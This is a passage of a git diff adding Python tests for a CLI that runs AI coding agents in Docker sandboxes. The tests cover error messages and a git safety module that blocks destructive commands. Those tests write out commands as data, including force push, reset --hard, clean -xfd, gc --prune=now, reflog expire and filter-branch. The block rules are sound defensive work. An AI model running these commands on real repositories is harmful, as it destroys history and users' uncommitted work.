═══════════════════════════════════════════════════════════════════════════════ +# ProviderNotReadyError — actionable messages +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestProviderNotReadyErrorMessages: + """ProviderNotReadyError must always include actionable guidance.""" + + def test_default_message_includes_doctor_command(self) -> None: + """Default suggested_action includes 'scc doctor' command.""" + err = ProviderNotReadyError(provider_id="claude") + assert "scc doctor" in err.suggested_action + assert "--provider claude" in err.suggested_action + + def test_default_message_identifies_provider(self) -> None: + """Default user_message names the provider.""" + err = ProviderNotReadyError(provider_id="codex") + assert "codex" in err.user_message + + def test_custom_message_preserved(self) -> None: + """Custom user_message is not overwritten by __post_init__.""" + err = ProviderNotReadyError( + provider_id="claude", + user_message="Custom auth failure message", + suggested_action="Do this specific thing", + ) + assert err.user_message == "Custom auth failure message" + assert err.suggested_action == "Do this specific thing" + + def test_exit_code_is_prerequisite(self) -> None: + """ProviderNotReadyError has exit code 3 (prerequisite).""" + err = ProviderNotReadyError(provider_id="claude") + assert err.exit_code == 3 + + def test_non_interactive_auth_missing_gives_fix_command(self) -> None: + """Non-interactive ProviderNotReadyError includes the exact CLI command.""" + err = ProviderNotReadyError( + provider_id="codex", + user_message="Codex auth cache is missing and this start is non-interactive.", + suggested_action=( + "Run 'scc start --provider codex' interactively once and " + "complete the one-time browser sign-in." + ), + ) + assert "scc start --provider codex" in err.suggested_action + assert "interactively" in err.suggested_action + + +# ═══════════════════════════════════════════════════════════════════════════════ +# InvalidProviderError — lists valid options +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestInvalidProviderErrorMessages: + """InvalidProviderError must list valid provider names.""" + + def test_lists_known_providers(self) -> None: + """Error message lists all known providers.""" + err = InvalidProviderError( + provider_id="typo", + known_providers=("claude", "codex"), + ) + assert "claude" in err.user_message + assert "codex" in err.user_message + assert "typo" in err.user_message + + def test_suggested_action_lists_valid_options(self) -> None: + """Suggested action includes 'Use one of:' with provider names.""" + err = InvalidProviderError( + provider_id="invalid", + known_providers=("claude", "codex"), + ) + assert "claude" in err.suggested_action + assert "codex" in err.suggested_action + + def test_exit_code_is_usage(self) -> None: + """InvalidProviderError has exit code 2 (usage).""" + err = InvalidProviderError( + provider_id="x", + known_providers=("claude",), + ) + assert err.exit_code == 2 + + def test_empty_known_providers_still_works(self) -> None: + """Even with empty known_providers, the error is constructible.""" + err = InvalidProviderError(provider_id="ghost", known_providers=()) + assert "ghost" in err.user_message + + +# ═══════════════════════════════════════════════════════════════════════════════ +# ProviderImageMissingError — build command +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestProviderImageMissingErrorMessages: + """ProviderImageMissingError must include the build command.""" + + def test_includes_docker_build_command(self) -> None: + """Suggested action contains 'docker build'.""" + err = ProviderImageMissingError( + provider_id="claude", + image_ref="scc-agent-claude:latest", + ) + assert "docker build" in err.suggested_action + assert "scc-agent-claude" in err.suggested_action + + def test_image_ref_in_message(self) -> None: + """User message includes the image ref.""" + err = ProviderImageMissingError( + provider_id="codex", + image_ref="scc-agent-codex:latest", + ) + assert "scc-agent-codex:latest" in err.user_message + + def test_no_provider_fallback(self) -> None: + """Without provider_id, suggested action is still present.""" + err = ProviderImageMissingError() + assert err.suggested_action # Not empty + + +# ═══════════════════════════════════════════════════════════════════════════════ +# ProviderImageBuildError — build command +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestProviderImageBuildErrorMessages: + """ProviderImageBuildError provides the retry command.""" + + def test_includes_build_command(self) -> None: + """When build_command is set, suggested_action includes it.""" + err = ProviderImageBuildError( + provider_id="claude", + build_command="docker build -t scc-agent-claude images/scc-agent-claude/", + ) + assert "docker build" in err.suggested_action + + def test_no_build_command_fallback(self) -> None: + """Without build_command, suggested_action is still actionable.""" + err = ProviderImageBuildError(provider_id="claude") + assert ( + "try again" in err.suggested_action.lower() or "retry" in err.suggested_action.lower() + ) + + +# ═══════════════════════════════════════════════════════════════════════════════ +# ProviderNotAllowedError — lists allowed providers +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestProviderNotAllowedErrorMessages: + """ProviderNotAllowedError names the allowed providers and suggests a fix.""" + + def test_lists_allowed_providers(self) -> None: + """Error message includes allowed providers.""" + err = ProviderNotAllowedError( + provider_id="codex", + allowed_providers=("claude",), + ) + assert "claude" in err.user_message + assert "codex" in err.user_message + + def test_suggested_action_mentions_admin(self) -> None: + """Suggested action points user to team admin.""" + err = ProviderNotAllowedError( + provider_id="codex", + allowed_providers=("claude",), + ) + assert ( + "admin" in err.suggested_action.lower() or "allowed_providers" in err.suggested_action + ) + + +# ═══════════════════════════════════════════════════════════════════════════════ +# SandboxLaunchError — Docker stderr surfacing +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestSandboxLaunchErrorMessages: + """SandboxLaunchError must surface Docker stderr so the user can diagnose.""" + + def test_stderr_in_suggested_action(self) -> None: + """Docker stderr is included in suggested_action.""" + err = SandboxLaunchError( + stderr="no space left on device", + ) + assert "no space left on device" in err.suggested_action + + def test_empty_stderr_clean_message(self) -> None: + """When stderr is empty/whitespace, no Docker error line appended.""" + err = SandboxLaunchError(stderr=" ") + assert "Docker error:" not in err.suggested_action + + def test_no_stderr_clean_message(self) -> None: + """When stderr is None, suggested_action is still actionable.""" + err = SandboxLaunchError() + assert "Docker Desktop" in err.suggested_action or "Docker" in err.suggested_action + + +# ═══════════════════════════════════════════════════════════════════════════════ +# ExistingSandboxConflictError — actionable commands +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestExistingSandboxConflictErrorMessages: + """ExistingSandboxConflictError must give specific commands.""" + + def test_includes_scc_fresh_and_stop(self) -> None: + """Suggested action includes --fresh and scc stop.""" + err = ExistingSandboxConflictError(container_name="scc-my-project-claude") + assert "--fresh" in err.suggested_action + assert "scc stop" in err.suggested_action + + def test_container_name_in_stop_command(self) -> None: + """Container name appears in the stop command.""" + err = ExistingSandboxConflictError(container_name="scc-my-project-claude") + assert "scc-my-project-claude" in err.suggested_action + + def test_no_container_name_still_actionable(self) -> None: + """Without container name, suggestion is still meaningful.""" + err = ExistingSandboxConflictError() + assert "--fresh" in err.suggested_action + + +# ═══════════════════════════════════════════════════════════════════════════════ +# LaunchPolicyBlockedError — policy context +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestLaunchPolicyBlockedErrorMessages: + """LaunchPolicyBlockedError explains the policy conflict.""" + + def test_includes_provider_and_policy(self) -> None: + """Message names the provider and network policy.""" + err = LaunchPolicyBlockedError( + provider_id="claude", + network_policy="enforced", + required_destination_sets=("claude-api", "github"), + ) + assert "claude" in err.user_message + assert "enforced" in err.user_message + assert "claude-api" in err.user_message + + def test_suggested_action_is_actionable(self) -> None: + """Suggested action tells user what to do.""" + err = LaunchPolicyBlockedError( + provider_id="codex", + network_policy="enforced", + ) + assert ( + "policy" in err.suggested_action.lower() or "provider" in err.suggested_action.lower() + ) + + +# ═══════════════════════════════════════════════════════════════════════════════ +# DockerNotFoundError / DockerDaemonNotRunningError — SCC context +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestDockerPrerequisiteErrors: + """Docker errors include SCC-level context, not raw Docker output.""" + + def test_docker_not_found_has_install_link(self) -> None: + """DockerNotFoundError suggested_action includes install URL.""" + err = DockerNotFoundError() + assert "docker.com" in err.suggested_action or "docker" in err.suggested_action.lower() + + def test_docker_daemon_not_running_gives_next_step(self) -> None: + """DockerDaemonNotRunningError tells user to start Docker.""" + err = DockerDaemonNotRunningError() + assert "Start" in err.suggested_action or "start" in err.suggested_action + + def test_docker_not_found_exit_code(self) -> None: + """DockerNotFoundError has exit code 3 (prerequisite).""" + err = DockerNotFoundError() + assert err.exit_code == 3 + + +# ═══════════════════════════════════════════════════════════════════════════════ +# ensure_provider_auth — wrapping raw exceptions +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestEnsureProviderAuthErrorWrapping: + """ensure_provider_auth wraps raw exceptions with SCC context.""" + + def test_os_error_wrapped_with_guidance(self) -> None: + """OSError from bootstrap_auth is wrapped in ProviderNotReadyError.""" + from scc_cli.commands.launch.auth_bootstrap import ensure_provider_auth + + plan = MagicMock() + plan.resume = False + mock_provider = MagicMock() + mock_provider.auth_check.return_value = MagicMock(status="missing") + mock_provider.capability_profile.return_value = MagicMock(provider_id="claude") + mock_provider.bootstrap_auth.side_effect = OSError("Permission denied") + + deps = MagicMock() + deps.agent_provider = mock_provider + show = MagicMock() + + with pytest.raises(ProviderNotReadyError) as exc_info: + ensure_provider_auth( + plan, + dependencies=deps, + non_interactive=False, + show_notice=show, + ) + err = exc_info.value + assert "Permission denied" in err.user_message + assert "scc start --provider claude" in err.suggested_action + assert "scc doctor" in err.suggested_action + + def test_provider_not_ready_passes_through(self) -> None: + """ProviderNotReadyError from bootstrap_auth passes through unchanged.""" + from scc_cli.commands.launch.auth_bootstrap import ensure_provider_auth + + plan = MagicMock() + plan.resume = False + original = ProviderNotReadyError( + provider_id="codex", + user_message="Original message", + suggested_action="Original action", + ) + mock_provider = MagicMock() + mock_provider.auth_check.return_value = MagicMock(status="missing") + mock_provider.capability_profile.return_value = MagicMock(provider_id="codex") + mock_provider.bootstrap_auth.side_effect = original + + deps = MagicMock() + deps.agent_provider = mock_provider + show = MagicMock() + + with pytest.raises(ProviderNotReadyError) as exc_info: + ensure_provider_auth( + plan, + dependencies=deps, + non_interactive=False, + show_notice=show, + ) + # Should be the exact same object, not double-wrapped + assert exc_info.value is original + assert exc_info.value.user_message == "Original message" + + def test_non_interactive_missing_auth_gives_fix(self) -> None: + """Non-interactive mode with missing auth raises with fix command.""" + from scc_cli.commands.launch.auth_bootstrap import ensure_provider_auth + + plan = MagicMock() + plan.resume = False + mock_provider = MagicMock() + mock_provider.auth_check.return_value = MagicMock(status="missing") + mock_provider.capability_profile.return_value = MagicMock(provider_id="codex") + + deps = MagicMock() + deps.agent_provider = mock_provider + show = MagicMock() + + with pytest.raises(ProviderNotReadyError) as exc_info: + ensure_provider_auth( + plan, + dependencies=deps, + non_interactive=True, + show_notice=show, + ) + err = exc_info.value + assert "non-interactive" in err.user_message + assert "scc start --provider codex" in err.suggested_action + + def test_resume_skips_auth_check(self) -> None: + """Resume mode skips auth bootstrap entirely.""" + from scc_cli.commands.launch.auth_bootstrap import ensure_provider_auth + + plan = MagicMock() + plan.resume = True + mock_provider = MagicMock() + + deps = MagicMock() + deps.agent_provider = mock_provider + + # Should not raise, no bootstrap called + ensure_provider_auth( + plan, + dependencies=deps, + non_interactive=False, + show_notice=MagicMock(), + ) + mock_provider.bootstrap_auth.assert_not_called() + + +# ═══════════════════════════════════════════════════════════════════════════════ +# choose_start_provider — non-interactive error messages +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestChooseStartProviderErrorMessages: + """choose_start_provider raises actionable errors in non-interactive mode.""" + + def test_multiple_providers_no_selection_gives_fix(self) -> None: + """When multiple providers available but none selected, error is actionable.""" + from scc_cli.commands.launch.provider_choice import choose_start_provider + + with pytest.raises(ProviderNotReadyError) as exc_info: + choose_start_provider( + cli_flag=None, + resume_provider=None, + workspace_last_used=None, + config_provider=None, + connected_provider_ids=("claude", "codex"), + allowed_providers=(), + non_interactive=True, + prompt_choice=None, + ) + err = exc_info.value + assert "--provider" in err.suggested_action + assert "scc provider set" in err.suggested_action + + def test_no_prompt_choice_gives_terminal_guidance(self) -> None: + """When prompt_choice is None, error tells user to use interactive terminal.""" + from scc_cli.commands.launch.provider_choice import choose_start_provider + + with pytest.raises(ProviderNotReadyError) as exc_info: + choose_start_provider( + cli_flag=None, + resume_provider=None, + workspace_last_used=None, + config_provider=None, + connected_provider_ids=("claude", "codex"), + allowed_providers=(), + non_interactive=False, + prompt_choice=None, + ) + err = exc_info.value + assert "interactive" in err.suggested_action.lower() + + +# ═══════════════════════════════════════════════════════════════════════════════ +# Doctor check errors — Docker errors wrapped with SCC context +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestDoctorCheckErrorWrapping: + """Doctor checks wrap Docker errors with SCC context.""" + + def test_docker_check_failure_has_fix_hint(self) -> None: + """check_docker returns fix_hint with install instructions.""" + from unittest.mock import patch as mock_patch + + from scc_cli.doctor.checks.environment import check_docker + + # docker_module is imported inside the function as `from ... import docker` + # which resolves to scc_cli.docker — patch that module's function + with mock_patch("scc_cli.docker.get_docker_version", return_value=None): + result = check_docker() + + assert not result.passed + assert result.fix_hint is not None + assert "docker" in result.fix_hint.lower() or "Docker" in result.fix_hint + + def test_docker_daemon_check_failure_has_fix_hint(self) -> None: + """check_docker_running returns fix_hint when daemon unreachable.""" + from unittest.mock import patch as mock_patch + + from scc_cli.doctor.checks.environment import check_docker_running + + with mock_patch( + "scc_cli.doctor.checks.environment.subprocess.run", + side_effect=FileNotFoundError("docker not found"), + ): + result = check_docker_running() + + assert not result.passed + assert result.fix_hint is not None + + def test_provider_auth_check_failure_has_fix_hint(self) -> None: + """check_provider_auth returns fix_hint when auth check fails.""" + from unittest.mock import patch as mock_patch + + from scc_cli.doctor.checks.environment import check_provider_auth + + mock_adapters = MagicMock() + mock_provider = MagicMock() + mock_provider.auth_check.return_value = AuthReadiness( + status="missing", + mechanism="oauth_file", + guidance="Run 'scc start --provider claude' to sign in", + ) + mock_adapters.agent_provider = mock_provider + + with mock_patch( + "scc_cli.bootstrap.get_default_adapters", + return_value=mock_adapters, + ): + result = check_provider_auth(provider_id="claude") + + assert not result.passed + assert result.fix_hint is not None + assert "scc start" in result.fix_hint + + def test_provider_image_check_failure_has_build_command(self) -> None: + """check_provider_image returns fix_commands with docker build.""" + from unittest.mock import patch as mock_patch + + from scc_cli.doctor.checks.environment import check_provider_image + + mock_spec = MagicMock() + mock_spec.image_ref = "scc-agent-claude:latest" + + with ( + mock_patch( + "scc_cli.core.provider_registry.get_runtime_spec", + return_value=mock_spec, + ), + mock_patch( + "scc_cli.doctor.checks.environment.subprocess.run", + ) as mock_run, + ): + mock_result = MagicMock() + mock_result.returncode = 1 + mock_run.return_value = mock_result + result = check_provider_image(provider_id="claude") + + assert not result.passed + assert result.fix_commands is not None + assert any("docker build" in cmd for cmd in result.fix_commands) + + +# ═══════════════════════════════════════════════════════════════════════════════ +# Error hierarchy sanity +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestErrorHierarchySanity: + """Error hierarchy is consistent — all SCC errors have user_message and suggested_action.""" + + @pytest.mark.parametrize( + "error_cls,kwargs", + [ + (ProviderNotReadyError, {"provider_id": "claude"}), + (InvalidProviderError, {"provider_id": "bad", "known_providers": ("claude", "codex")}), + (ProviderImageMissingError, {"provider_id": "claude", "image_ref": "img:latest"}), + (ProviderNotAllowedError, {"provider_id": "codex", "allowed_providers": ("claude",)}), + (SandboxLaunchError, {"stderr": "test error"}), + (DockerNotFoundError, {}), + (DockerDaemonNotRunningError, {}), + (ExistingSandboxConflictError, {"container_name": "scc-test"}), + (LaunchPolicyBlockedError, {"provider_id": "claude", "network_policy": "enforced"}), + ], + ) + def test_every_error_has_user_message_and_action( + self, error_cls: type[SCCError], kwargs: dict + ) -> None: + """Every error class produces a non-empty user_message and suggested_action.""" + err = error_cls(**kwargs) + assert err.user_message, f"{error_cls.__name__} has empty user_message" + assert err.suggested_action, f"{error_cls.__name__} has empty suggested_action" + + @pytest.mark.parametrize( + "error_cls,kwargs,expected_exit_code", + [ + (ProviderNotReadyError, {"provider_id": "claude"}, 3), + (InvalidProviderError, {"provider_id": "x", "known_providers": ()}, 2), + (SandboxLaunchError, {}, 5), + (DockerNotFoundError, {}, 3), + (ConfigError, {}, 2), + ], + ) + def test_exit_codes_match_documented_scheme( + self, + error_cls: type[SCCError], + kwargs: dict, + expected_exit_code: int, + ) -> None: + """Exit codes match the documented scheme (2=usage, 3=prereq, 4=tool, 5=internal).""" + err = error_cls(**kwargs) + assert err.exit_code == expected_exit_code diff --git a/tests/test_file_sizes.py b/tests/test_file_sizes.py index fc14fc7..743432d 100644 --- a/tests/test_file_sizes.py +++ b/tests/test_file_sizes.py @@ -154,9 +154,6 @@ def format_failure(file_info: FileInfo) -> str: class TestFileSizes: """Test class for file size guardrails.""" - @pytest.mark.xfail( - reason="commands/launch/app.py exceeds limit - to be split in future refactor" - ) def test_file_size_limits(self) -> None: """Verify all Python files in src/scc_cli/ are within size limits. diff --git a/tests/test_function_sizes.py b/tests/test_function_sizes.py index ab2a34d..3c77271 100644 --- a/tests/test_function_sizes.py +++ b/tests/test_function_sizes.py @@ -167,12 +167,6 @@ def format_failure(function_info: FunctionInfo) -> str: class TestFunctionSizes: """Test class for function size guardrails.""" - @pytest.mark.xfail( - reason=( - "Known large functions exceed guardrail (launch flow and org/reset commands). " - "Tracked in maintainability refactor." - ) - ) def test_function_size_limits(self) -> None: """Verify all functions in src/scc_cli/ are within size limits.""" functions = get_function_sizes(SRC_DIR) diff --git a/tests/test_git_safety_rules.py b/tests/test_git_safety_rules.py new file mode 100644 index 0000000..4042bdd --- /dev/null +++ b/tests/test_git_safety_rules.py @@ -0,0 +1,591 @@ +"""Tests for git command analysis rules with typed SafetyVerdict returns.""" + +from __future__ import annotations + +from scc_cli.core.enums import CommandFamily +from scc_cli.core.git_safety_rules import ( + analyze_branch, + analyze_checkout, + analyze_clean, + analyze_filter_branch, + analyze_gc, + analyze_git, + analyze_push, + analyze_reflog, + analyze_reset, + analyze_restore, + analyze_stash, + has_force_flag, + has_force_refspec, + has_force_with_lease, + normalize_git_tokens, +) + +# ───────────────────────────────────────────────────────────────────────────── +# Helper function tests (unchanged types — bool / tuple) +# ───────────────────────────────────────────────────────────────────────────── + + +class TestNormalizeGitTokens: + """Tests for normalize_git_tokens function.""" + + def test_empty_tokens(self) -> None: + assert normalize_git_tokens([]) == ("", []) + + def test_not_git_command(self) -> None: + assert normalize_git_tokens(["python", "script.py"]) == ("", []) + + def test_simple_git_command(self) -> None: + result = normalize_git_tokens(["git", "push", "origin"]) + assert result == ("push", ["origin"]) + + def test_full_path_git(self) -> None: + result = normalize_git_tokens(["/usr/bin/git", "push"]) + assert result == ("push", []) + + def test_git_with_c_dir_flag(self) -> None: + result = normalize_git_tokens(["git", "-C", "/path", "push", "origin"]) + assert result == ("push", ["origin"]) + + def test_git_with_c_flag(self) -> None: + result = normalize_git_tokens(["git", "-c", "user.name=foo", "push"]) + assert result == ("push", []) + + def test_git_with_git_dir(self) -> None: + result = normalize_git_tokens(["git", "--git-dir=/path/.git", "status"]) + assert result == ("status", []) + + def test_git_with_work_tree(self) -> None: + result = normalize_git_tokens(["git", "--work-tree=/path", "diff"]) + assert result == ("diff", []) + + def test_git_with_multiple_global_options(self) -> None: + result = normalize_git_tokens(["git", "-C", "/path", "--git-dir=.git", "push", "-f"]) + assert result == ("push", ["-f"]) + + +class TestHasForceFlag: + """Tests for has_force_flag function.""" + + def test_empty_args(self) -> None: + assert has_force_flag([]) is False + + def test_no_force(self) -> None: + assert has_force_flag(["origin", "main"]) is False + + def test_short_force(self) -> None: + assert has_force_flag(["-f"]) is True + + def test_long_force(self) -> None: + assert has_force_flag(["--force"]) is True + + def test_combined_flags_with_f(self) -> None: + assert has_force_flag(["-xfd"]) is True + assert has_force_flag(["-fd"]) is True + + def test_long_flag_no_force(self) -> None: + assert has_force_flag(["--follow"]) is False + + def test_force_in_middle(self) -> None: + assert has_force_flag(["origin", "-f", "main"]) is True + + +class TestHasForceRefspec: + """Tests for has_force_refspec function.""" + + def test_empty_args(self) -> None: + assert has_force_refspec([]) is False + + def test_no_plus(self) -> None: + assert has_force_refspec(["origin", "main"]) is False + + def test_plus_at_start(self) -> None: + assert has_force_refspec(["+main"]) is True + assert has_force_refspec(["origin", "+main"]) is True + + def test_plus_in_refspec(self) -> None: + assert has_force_refspec(["+main:main"]) is True + + def test_colon_plus_pattern(self) -> None: + assert has_force_refspec(["HEAD:+main"]) is True + + def test_double_plus_not_force(self) -> None: + assert has_force_refspec(["++something"]) is False + + def test_flags_skipped(self) -> None: + assert has_force_refspec(["-u", "origin", "+main"]) is True + + +class TestHasForceWithLease: + """Tests for has_force_with_lease function.""" + + def test_empty_args(self) -> None: + assert has_force_with_lease([]) is False + + def test_no_force_with_lease(self) -> None: + assert has_force_with_lease(["--force"]) is False + + def test_force_with_lease(self) -> None: + assert has_force_with_lease(["--force-with-lease"]) is True + + def test_force_with_lease_value(self) -> None: + assert has_force_with_lease(["--force-with-lease=main"]) is True + + +# ───────────────────────────────────────────────────────────────────────────── +# Analyzer tests — now assert typed SafetyVerdict fields +# ───────────────────────────────────────────────────────────────────────────── + + +class TestAnalyzePush: + """Tests for analyze_push function.""" + + def test_normal_push(self) -> None: + assert analyze_push(["origin", "main"]) is None + + def test_force_flag(self) -> None: + result = analyze_push(["--force"]) + assert result is not None + assert result.allowed is False + assert result.matched_rule == "git.force_push" + assert result.command_family == CommandFamily.DESTRUCTIVE_GIT + + result2 = analyze_push(["-f"]) + assert result2 is not None + assert result2.allowed is False + + def test_force_refspec(self) -> None: + result = analyze_push(["+main"]) + assert result is not None + assert result.allowed is False + assert result.matched_rule == "git.force_push" + + result2 = analyze_push(["origin", "+main:main"]) + assert result2 is not None + assert result2.allowed is False + + def test_force_with_lease_allowed(self) -> None: + assert analyze_push(["--force-with-lease"]) is None + assert analyze_push(["--force-with-lease", "origin", "main"]) is None + + def test_combined_flags(self) -> None: + result = analyze_push(["-fu"]) + assert result is not None + assert result.allowed is False + + def test_mirror_blocked(self) -> None: + result = analyze_push(["--mirror"]) + assert result is not None + assert result.allowed is False + assert result.matched_rule == "git.push_mirror" + assert "mirror" in result.reason.lower() + + +class TestAnalyzeReset: + """Tests for analyze_reset function.""" + + def test_soft_reset(self) -> None: + assert analyze_reset(["--soft", "HEAD~1"]) is None + + def test_mixed_reset(self) -> None: + assert analyze_reset(["--mixed", "HEAD~1"]) is None + assert analyze_reset(["HEAD~1"]) is None # Default is mixed + + def test_hard_reset(self) -> None: + result = analyze_reset(["--hard"]) + assert result is not None + assert result.allowed is False + assert result.matched_rule == "git.reset_hard" + assert result.command_family == CommandFamily.DESTRUCTIVE_GIT + + result2 = analyze_reset(["--hard", "HEAD~1"]) + assert result2 is not None + assert result2.allowed is False + + +class TestAnalyzeBranch: + """Tests for analyze_branch function.""" + + def test_list_branches(self) -> None: + assert analyze_branch([]) is None + assert analyze_branch(["-a"]) is None + + def test_safe_delete(self) -> None: + assert analyze_branch(["-d", "feature"]) is None + + def test_force_delete_uppercase_d(self) -> None: + result = analyze_branch(["-D", "feature"]) + assert result is not None + assert result.allowed is False + assert result.matched_rule == "git.branch_force_delete" + + def test_delete_with_force(self) -> None: + result = analyze_branch(["--delete", "--force", "feature"]) + assert result is not None + assert result.allowed is False + assert result.matched_rule == "git.branch_force_delete" + + +class TestAnalyzeStash: + """Tests for analyze_stash function.""" + + def test_stash_push(self) -> None: + assert analyze_stash([]) is None + assert analyze_stash(["push"]) is None + + def test_stash_pop(self) -> None: + assert analyze_stash(["pop"]) is None + + def test_stash_apply(self) -> None: + assert analyze_stash(["apply"]) is None + + def test_stash_list(self) -> None: + assert analyze_stash(["list"]) is None + + def test_stash_drop(self) -> None: + result = analyze_stash(["drop"]) + assert result is not None + assert result.allowed is False + assert result.matched_rule == "git.stash_drop" + + result2 = analyze_stash(["drop", "stash@{0}"]) + assert result2 is not None + assert result2.allowed is False + + def test_stash_clear(self) -> None: + result = analyze_stash(["clear"]) + assert result is not None + assert result.allowed is False + assert result.matched_rule == "git.stash_clear" + + +class TestAnalyzeClean: + """Tests for analyze_clean function.""" + + def test_dry_run(self) -> None: + assert analyze_clean(["-n"]) is None + assert analyze_clean(["--dry-run"]) is None + assert analyze_clean(["-n", "-f"]) is None # Dry run takes precedence + + def test_force_clean(self) -> None: + result = analyze_clean(["-f"]) + assert result is not None + assert result.allowed is False + assert result.matched_rule == "git.clean_force" + + result2 = analyze_clean(["--force"]) + assert result2 is not None + assert result2.allowed is False + + def test_force_directory(self) -> None: + result = analyze_clean(["-fd"]) + assert result is not None + assert result.allowed is False + + result2 = analyze_clean(["-df"]) + assert result2 is not None + assert result2.allowed is False + + def test_force_ignored(self) -> None: + result = analyze_clean(["-xfd"]) + assert result is not None + assert result.allowed is False + + +class TestAnalyzeCheckout: + """Tests for analyze_checkout function.""" + + def test_switch_branch(self) -> None: + assert analyze_checkout(["main"]) is None + assert analyze_checkout(["-b", "feature"]) is None + + def test_checkout_path(self) -> None: + result = analyze_checkout(["--", "file.py"]) + assert result is not None + assert result.allowed is False + assert result.matched_rule == "git.checkout_path" + + def test_checkout_head_path(self) -> None: + result = analyze_checkout(["HEAD", "--", "file.py"]) + assert result is not None + assert result.allowed is False + + def test_checkout_branch_path(self) -> None: + result = analyze_checkout(["main", "--", "file.py"]) + assert result is not None + assert result.allowed is False + + def test_separator_without_path(self) -> None: + assert analyze_checkout(["--"]) is None + + +class TestAnalyzeRestore: + """Tests for analyze_restore function.""" + + def test_empty_args(self) -> None: + assert analyze_restore([]) is None + + def test_staged_only(self) -> None: + assert analyze_restore(["--staged", "file.py"]) is None + assert analyze_restore(["-S", "file.py"]) is None + + def test_worktree_restore(self) -> None: + result = analyze_restore(["file.py"]) + assert result is not None + assert result.allowed is False + assert result.matched_rule == "git.restore_worktree" + + result2 = analyze_restore(["--worktree", "file.py"]) + assert result2 is not None + assert result2.allowed is False + + result3 = analyze_restore(["-W", "file.py"]) + assert result3 is not None + assert result3.allowed is False + + def test_both_staged_and_worktree(self) -> None: + result = analyze_restore(["--staged", "--worktree", "file.py"]) + assert result is not None + assert result.allowed is False + + result2 = analyze_restore(["-S", "-W", "file.py"]) + assert result2 is not None + assert result2.allowed is False + + +class TestAnalyzeReflog: + """Tests for analyze_reflog function.""" + + def test_reflog_show(self) -> None: + assert analyze_reflog([]) is None + assert analyze_reflog(["show"]) is None + + def test_reflog_expire_safe(self) -> None: + assert analyze_reflog(["expire"]) is None + assert analyze_reflog(["expire", "--all"]) is None + + def test_reflog_expire_unreachable_now_combined(self) -> None: + result = analyze_reflog(["expire", "--expire-unreachable=now"]) + assert result is not None + assert result.allowed is False + assert result.matched_rule == "git.reflog_expire" + + result2 = analyze_reflog(["expire", "--all", "--expire-unreachable=now"]) + assert result2 is not None + assert result2.allowed is False + + def test_reflog_expire_unreachable_now_separate(self) -> None: + result = analyze_reflog(["expire", "--expire-unreachable", "now"]) + assert result is not None + assert result.allowed is False + + result2 = analyze_reflog(["expire", "--expire-unreachable", "now", "--all"]) + assert result2 is not None + assert result2.allowed is False + + def test_reflog_expire_other_values(self) -> None: + assert analyze_reflog(["expire", "--expire-unreachable=2.weeks.ago"]) is None + assert analyze_reflog(["expire", "--expire-unreachable", "30.days.ago"]) is None + + +class TestAnalyzeGc: + """Tests for analyze_gc function.""" + + def test_gc_default(self) -> None: + assert analyze_gc([]) is None + + def test_gc_aggressive(self) -> None: + assert analyze_gc(["--aggressive"]) is None + + def test_gc_prune_now_combined(self) -> None: + result = analyze_gc(["--prune=now"]) + assert result is not None + assert result.allowed is False + assert result.matched_rule == "git.gc_prune" + + result2 = analyze_gc(["--aggressive", "--prune=now"]) + assert result2 is not None + assert result2.allowed is False + + def test_gc_prune_now_separate(self) -> None: + result = analyze_gc(["--prune", "now"]) + assert result is not None + assert result.allowed is False + + result2 = analyze_gc(["--prune", "now", "--aggressive"]) + assert result2 is not None + assert result2.allowed is False + + def test_gc_prune_other_values(self) -> None: + assert analyze_gc(["--prune=2.weeks.ago"]) is None + assert analyze_gc(["--prune", "30.days.ago"]) is None + + +class TestAnalyzeFilterBranch: + """Tests for analyze_filter_branch function.""" + + def test_filter_branch_always_blocked(self) -> None: + result = analyze_filter_branch([]) + assert result is not None + assert result.allowed is False + assert result.matched_rule == "git.filter_branch" + assert result.command_family == CommandFamily.DESTRUCTIVE_GIT + + result2 = analyze_filter_branch(["--tree-filter", "rm -f passwords.txt"]) + assert result2 is not None + assert result2.allowed is False + + result3 = analyze_filter_branch(["--env-filter", "..."]) + assert result3 is not None + assert result3.allowed is False + + def test_filter_branch_message_content(self) -> None: + result = analyze_filter_branch([]) + assert result is not None + assert "filter-branch" in result.reason.lower() + assert "filter-repo" in result.reason.lower() + + +# ───────────────────────────────────────────────────────────────────────────── +# Integration tests — analyze_git entry point +# ───────────────────────────────────────────────────────────────────────────── + + +class TestAnalyzeGit: + """Integration tests for analyze_git function.""" + + def test_non_git_command(self) -> None: + assert analyze_git(["python", "script.py"]) is None + + def test_git_without_subcommand(self) -> None: + assert analyze_git(["git"]) is None + + def test_force_push(self) -> None: + result = analyze_git(["git", "push", "--force"]) + assert result is not None + assert result.allowed is False + assert result.command_family == CommandFamily.DESTRUCTIVE_GIT + + assert analyze_git(["git", "push", "-f"]) is not None + assert analyze_git(["git", "push", "origin", "+main"]) is not None + + def test_force_with_lease(self) -> None: + assert analyze_git(["git", "push", "--force-with-lease"]) is None + + def test_reset_hard(self) -> None: + assert analyze_git(["git", "reset", "--hard"]) is not None + + def test_reset_soft(self) -> None: + assert analyze_git(["git", "reset", "--soft"]) is None + + def test_branch_force_delete(self) -> None: + assert analyze_git(["git", "branch", "-D", "feature"]) is not None + + def test_branch_safe_delete(self) -> None: + assert analyze_git(["git", "branch", "-d", "feature"]) is None + + def test_stash_drop(self) -> None: + assert analyze_git(["git", "stash", "drop"]) is not None + + def test_stash_pop(self) -> None: + assert analyze_git(["git", "stash", "pop"]) is None + + def test_clean_force(self) -> None: + assert analyze_git(["git", "clean", "-f"]) is not None + assert analyze_git(["git", "clean", "-xfd"]) is not None + + def test_clean_dry_run(self) -> None: + assert analyze_git(["git", "clean", "-n"]) is None + + def test_checkout_path(self) -> None: + assert analyze_git(["git", "checkout", "--", "file.py"]) is not None + + def test_checkout_branch(self) -> None: + assert analyze_git(["git", "checkout", "main"]) is None + + def test_restore_worktree(self) -> None: + assert analyze_git(["git", "restore", 